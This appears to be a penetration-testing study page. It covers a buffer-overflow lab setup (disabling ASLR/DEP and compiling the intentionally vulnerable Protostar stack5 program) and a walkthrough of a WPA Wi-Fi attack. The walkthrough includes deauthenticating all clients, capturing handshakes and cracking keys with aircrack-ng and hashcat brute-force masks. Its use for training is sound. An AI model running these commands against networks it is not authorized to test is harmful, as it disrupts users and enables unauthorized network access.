Linux BOF & Wireless Attacks
Environment setup
install
edb
sudo apt-get install edb
disable
ASLR
andDEP
on linux
sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"
cat /proc/sys/kernel/randomize_va_space
sudo nano /etc/default/grub
# GRUB_CMDLINE_LINUX_DEFAULT="quiet splash noexec=off noexec32=off clearcpuid=514"
sudo update-grub
sudo reboot
edb
is pretty much the same asimmunity debugger
you can do the same steps as we did on windows.
GDB Basics Cheat Sheet
Starting and Quitting
gdb <program>
: Start GDB with a program.run
orr
: Start the program.quit
orq
: Exit GDB.
Breakpoints
break <location>
orb <location>
: Set a breakpoint.info breakpoints
ori b
: List breakpoints.delete <num>
ord <num>
: Delete a breakpoint.
Stepping and Continuing
next
orn
: Step to the next line (skip functions).step
ors
: Step into a function.continue
orc
: Continue execution.
Inspecting Variables and Memory
print <expr>
orp <expr>
: Print value of an expression.x/<format> <address>
: Examine memory (e.g.,x/4x
for 4 hex values).info locals
: Show local variables.
Stack and Frames
backtrace
orbt
: Show the call stack.frame <num>
orf <num>
: Switch to a frame.info frame
: Show details of the current frame.
Running and Control
kill
: Stop program execution.jump <location>
: Jump to a line or address.
Threads
info threads
: List threads.thread <num>
: Switch to a thread.
Exploit Vuln program
protostar stack5
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
compile 32-bit program with no ASLR and no execution protection
gcc -m32 -no-pie -fno-stack-protector stack5.c -o stack5
Wireless
Config Adapter TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
check Adapter info
iwconfig
lsusb
install required drivers
sudo apt install realtek-rtl8188eus-dkms -y
start monitoring
check the wireless adapter for monitor mode:
sudo airmon-ng check kill
Start monitor mode on the wireless interface, this will change the interface name to
wlan0mon
sudo airmon-ng start wlan0
Now let’s capture the wireless packets that fly around us on the air to know what wifi networks available.
sudo airodump-ng wlan0
BSSID: The MAC address (unique identifier) of the access point or router.
ESSID: The network name (SSID) broadcast by the access point.
ENC: The encryption protocol used (e.g., WEP, WPA, WPA2).
Cipher: The encryption algorithm used for securing the data (e.g., CCMP, TKIP).
Auth: The authentication method (e.g., PSK, MGT) used to verify devices connecting to the network.
Channel: The specific frequency band used on which the access point is operating.
Network power:

Attacking target:
Capturing the target traffic to/from clients to get authentication handshakes.
sudo airodump-ng –w captures -c <channel> –bssid <MAC Address> wlan0
De-authenticate all clients to force them authenticate and then capture the authentication packets.
sudo aireplay-ng --deauth 0 -a <MAC Address of AP> wlan0
No try to capture authentication handshakes again.
Inspecting the captured traffic with wireshark
:
wireshark capture-01.cap
In Wireshark we want to filter with eapol
to get the 4-way handshake for WiFi connections.
Cracking Authentication keys
Put the interface back to managed mode
sudo airmon-ng stop wlan0mon
Cracking
sudo aircrack-ng <pcap-file> -w /usr/share/wordlists/rockyou.txt
Cracking with hashcat
Convert the cap file to hash with hashcat utils or using this web app: https://hashcat.net/cap2hashcat/
./cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
Brute Force Attack for 8 Digits
hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?d?d?d?d?d?d?d?d
Brute Force Attack for 8 Characters (Digits and Alphabet)
hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?a?a?a?a?a?a?a?a
?a: Represents any alphanumeric character (lowercase, uppercase, digits, and symbols).
brute force lower letters
hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?l?l?l?l?l?l?l?l
Brute Force Attack for 8 to 11 Digits
hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?d?d?d?d?d?d?d?d --increment --increment-min=8 --increment-max=11
Last updated